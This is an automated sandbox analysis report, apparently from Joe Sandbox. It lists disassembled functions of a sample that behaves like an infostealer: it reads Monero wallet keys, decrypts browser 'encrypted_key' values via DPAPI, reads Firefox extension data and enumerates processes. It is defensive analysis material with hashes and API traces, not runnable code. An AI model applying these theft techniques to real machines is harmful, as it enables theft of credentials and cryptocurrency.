                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                      • String ID:
                                      • API String ID: 211194620-0
                                      • Opcode ID: fd39094401a14b6cf6bd71e91b2eda70f37f1d5782d66d2b610cc05cb9593d9c
                                      • Instruction ID: 4549f5567d8e4c58160b21b47b92ebd955c124db9bb94087beb5e8d6af69736f
                                      • Opcode Fuzzy Hash: fd39094401a14b6cf6bd71e91b2eda70f37f1d5782d66d2b610cc05cb9593d9c
                                      • Instruction Fuzzy Hash: 86911076D505189BDB04FBA0DEA2EEE7339EFA4340F404568F516A6191EF306E09CB72
                                      Function 00A3D880 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00A4AA50: lstrcpy.KERNEL32(00A50E1A,00000000), ref: 00A4AA98
                                        • Part of subcall function 00A4ACC0: lstrlen.KERNEL32(?,013189C8,?,\Monero\wallet.keys,00A50E1A), ref: 00A4ACD5
                                        • Part of subcall function 00A4ACC0: lstrcpy.KERNEL32(00000000), ref: 00A4AD14
                                        • Part of subcall function 00A4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00A4AD22
                                        • Part of subcall function 00A4ABB0: lstrcpy.KERNEL32(?,00A50E1A), ref: 00A4AC15
                                        • Part of subcall function 00A48CF0: GetSystemTime.KERNEL32(00A50E1B,0131E198,00A505B6,?,?,00A313F9,?,0000001A,00A50E1B,00000000,?,013189C8,?,\Monero\wallet.keys,00A50E1A), ref: 00A48D16
                                        • Part of subcall function 00A4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00A4AC82
                                        • Part of subcall function 00A4AC30: lstrcat.KERNEL32(00000000), ref: 00A4AC92
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00A3D901
                                      • lstrlen.KERNEL32(00000000), ref: 00A3DA9F
                                      • lstrlen.KERNEL32(00000000), ref: 00A3DAB3
                                      • DeleteFileA.KERNEL32(00000000), ref: 00A3DB32
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                      • String ID:
                                      • API String ID: 211194620-0
                                      • Opcode ID: 6a3a98a6a781fff53ffe94702546b5ce9702adbb0c0a44eade1f03902d8e6cdb
                                      • Instruction ID: 8eb93a0ac589dd38bf4901e70c6ac4ad72c97266b1121d3700c863f992830512
                                      • Opcode Fuzzy Hash: 6a3a98a6a781fff53ffe94702546b5ce9702adbb0c0a44eade1f03902d8e6cdb
                                      • Instruction Fuzzy Hash: 5A812D76D505189BDB04FBA4DEA2EEE7339BFA4340F404568F506A6191EF306E09CB72
                                      Function 00AAFED7 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AdjustPointer
                                      • String ID:
                                      • API String ID: 1740715915-0
                                      • Opcode ID: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                      • Instruction ID: 0adf0dc0f9f49bd4a8a263ffcb3aa8eaeeddc5f6fafb2bd60656c544eba543ec
                                      • Opcode Fuzzy Hash: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                      • Instruction Fuzzy Hash: BC51C072601206AFEB299F94C941FBEB7A8FF06311F24412DE906876D2E731ED40DB90
                                      Function 00A3A560 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 158memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LocalAlloc.KERNEL32(00000040,?), ref: 00A3A664
                                        • Part of subcall function 00A4AA50: lstrcpy.KERNEL32(00A50E1A,00000000), ref: 00A4AA98
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocLocallstrcpy
                                      • String ID: @$v10$v20
                                      • API String ID: 2746078483-278772428
                                      • Opcode ID: 18461ae41d9cfeff4db3b95243f1be2123e78bfee88fceb3a25e0db161b6436b
                                      • Instruction ID: dc0e305ed2fd5f991f784d63928d4b4b722cc5f833c5aaa9994b1c1ba075361f
                                      • Opcode Fuzzy Hash: 18461ae41d9cfeff4db3b95243f1be2123e78bfee88fceb3a25e0db161b6436b
                                      • Instruction Fuzzy Hash: 96516A75A50218EFDB28EFA4CE96FED7775BFA0344F008118F90A9B291DB706A05CB51
                                      Function 00A3F5A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00A4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00A4AAF6
                                        • Part of subcall function 00A3A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A3A13C
                                        • Part of subcall function 00A3A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00A3A161
                                        • Part of subcall function 00A3A110: LocalAlloc.KERNEL32(00000040,?), ref: 00A3A181
                                        • Part of subcall function 00A3A110: ReadFile.KERNEL32(000000FF,?,00000000,00A3148F,00000000), ref: 00A3A1AA
                                        • Part of subcall function 00A3A110: LocalFree.KERNEL32(00A3148F), ref: 00A3A1E0
                                        • Part of subcall function 00A3A110: CloseHandle.KERNEL32(000000FF), ref: 00A3A1EA
                                        • Part of subcall function 00A48FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00A48FE2
                                        • Part of subcall function 00A4AA50: lstrcpy.KERNEL32(00A50E1A,00000000), ref: 00A4AA98
                                        • Part of subcall function 00A4ACC0: lstrlen.KERNEL32(?,013189C8,?,\Monero\wallet.keys,00A50E1A), ref: 00A4ACD5
                                        • Part of subcall function 00A4ACC0: lstrcpy.KERNEL32(00000000), ref: 00A4AD14
                                        • Part of subcall function 00A4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00A4AD22
                                        • Part of subcall function 00A4ABB0: lstrcpy.KERNEL32(?,00A50E1A), ref: 00A4AC15
                                        • Part of subcall function 00A4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00A4AC82
                                        • Part of subcall function 00A4AC30: lstrcat.KERNEL32(00000000), ref: 00A4AC92
                                      • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00A51678,00A50D93), ref: 00A3F64C
                                      • lstrlen.KERNEL32(00000000), ref: 00A3F66B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                      • String ID: ^userContextId=4294967295$moz-extension+++
                                      • API String ID: 998311485-3310892237
                                      • Opcode ID: 17278be1eb6b6492d5456dd24b656850198dcd8068175d271283dd7357755709
                                      • Instruction ID: a2de120bc246f5e440aadd0f271aa19c6a99bd0d11d17f2b3f185125dc460ea7
                                      • Opcode Fuzzy Hash: 17278be1eb6b6492d5456dd24b656850198dcd8068175d271283dd7357755709
                                      • Instruction Fuzzy Hash: 7C514276D50108ABDB04FBA0DEA2DFD7379AFA4340F408568F91667191EE346A09CB62
                                      Function 00A437B0 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen
                                      • String ID:
                                      • API String ID: 367037083-0
                                      • Opcode ID: 2798b5717395bb20661f3b718591b3b5eb20ba45dd4d3c2fb93a631ce130f56b
                                      • Instruction ID: a0a78ff0195942bf021c68a955c54062384b8b3dc085f2bad81f11a0059518a2
                                      • Opcode Fuzzy Hash: 2798b5717395bb20661f3b718591b3b5eb20ba45dd4d3c2fb93a631ce130f56b
                                      • Instruction Fuzzy Hash: 8B412E7AD00209ABDF04EFA4D955EEEB778BF94304F008418F51677291EB70AA09CFA1
                                      Function 00A3A430 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00A4AA50: lstrcpy.KERNEL32(00A50E1A,00000000), ref: 00A4AA98
                                        • Part of subcall function 00A3A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A3A13C
                                        • Part of subcall function 00A3A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00A3A161
                                        • Part of subcall function 00A3A110: LocalAlloc.KERNEL32(00000040,?), ref: 00A3A181
                                        • Part of subcall function 00A3A110: ReadFile.KERNEL32(000000FF,?,00000000,00A3148F,00000000), ref: 00A3A1AA
                                        • Part of subcall function 00A3A110: LocalFree.KERNEL32(00A3148F), ref: 00A3A1E0
                                        • Part of subcall function 00A3A110: CloseHandle.KERNEL32(000000FF), ref: 00A3A1EA
                                        • Part of subcall function 00A48FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00A48FE2
                                      • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00A3A489
                                        • Part of subcall function 00A3A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00A34F3E,00000000,00000000), ref: 00A3A23F
                                        • Part of subcall function 00A3A210: LocalAlloc.KERNEL32(00000040,?,?,?,00A34F3E,00000000,?), ref: 00A3A251
                                        • Part of subcall function 00A3A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00A34F3E,00000000,00000000), ref: 00A3A27A
                                        • Part of subcall function 00A3A210: LocalFree.KERNEL32(?,?,?,?,00A34F3E,00000000,?), ref: 00A3A28F
                                        • Part of subcall function 00A3A2B0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00A3A2D4
                                        • Part of subcall function 00A3A2B0: LocalAlloc.KERNEL32(00000040,00000000), ref: 00A3A2F3
                                        • Part of subcall function 00A3A2B0: LocalFree.KERNEL32(?), ref: 00A3A323
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                      • String ID: $"encrypted_key":"$DPAPI
                                      • API String ID: 2100535398-738592651
                                      • Opcode ID: 5c3c7209f09722e0d33a2d3c748b6facf3a4d7093e4be273584e33ec133117a9
                                      • Instruction ID: bfe868336dd9c13fd602450475f834e9c4106e6c8b9dd9b95b94f8b4b341feeb
                                      • Opcode Fuzzy Hash: 5c3c7209f09722e0d33a2d3c748b6facf3a4d7093e4be273584e33ec133117a9
                                      • Instruction Fuzzy Hash: 9D3130B6D00219ABCF04DBE4DD45AEFB7B8BBA8300F444558F945A7281E7319E05CBA2
                                      Function 00A48810 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00A4AA50: lstrcpy.KERNEL32(00A50E1A,00000000), ref: 00A4AA98
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00A505BF), ref: 00A4885A
                                      • Process32First.KERNEL32(?,00000128), ref: 00A4886E
                                      • Process32Next.KERNEL32(?,00000128), ref: 00A48883
                                        • Part of subcall function 00A4ACC0: lstrlen.KERNEL32(?,013189C8,?,\Monero\wallet.keys,00A50E1A), ref: 00A4ACD5
                                        • Part of subcall function 00A4ACC0: lstrcpy.KERNEL32(00000000), ref: 00A4AD14
                                        • Part of subcall function 00A4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00A4AD22
                                        • Part of subcall function 00A4ABB0: lstrcpy.KERNEL32(?,00A50E1A), ref: 00A4AC15
                                      • CloseHandle.KERNEL32(?), ref: 00A488F1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                      • String ID:
                                      • API String ID: 1066202413-0
                                      • Opcode ID: e6d88ea949ecba9232bbaac730e2c6919e1ab4b58abdca816786172b3fd19043
                                      • Instruction ID: 27530e11036d3c559eca8d2c3bd62efa262e392b3f7cf51f5c531f7de46c0950
                                      • Opcode Fuzzy Hash: e6d88ea949ecba9232bbaac730e2c6919e1ab4b58abdca816786172b3fd19043
                                      • Instruction Fuzzy Hash: 25318B75941618ABDB24EF90DD51FEEB378FB94740F004199F10EA62A0DB306E44CFA1
                                      Function 00AAFDF7 Relevance: 6.1, APIs: 4, Instructions: 60COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00AAFE13
                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00AAFE2C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Value___vcrt_
                                      • String ID:
                                      • API String ID: 1426506684-0
                                      • Opcode ID: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                      • Instruction ID: 5e1a05d13f7424741e57a1a72b1e0ac9eb6451ccc6e2ad532b0def09d76c018f
                                      • Opcode Fuzzy Hash: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                      • Instruction Fuzzy Hash: 98018432209721EEF63827B45DD9AA73A99EB027B5734433AF516861F3EF514C419240
                                      Function 00A47B10 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00A50DE8,00000000,?), ref: 00A47B40
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00A47B47
                                      • GetLocalTime.KERNEL32(?,?,?,?,?,00A50DE8,00000000,?), ref: 00A47B54
                                      • wsprintfA.USER32 ref: 00A47B83
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
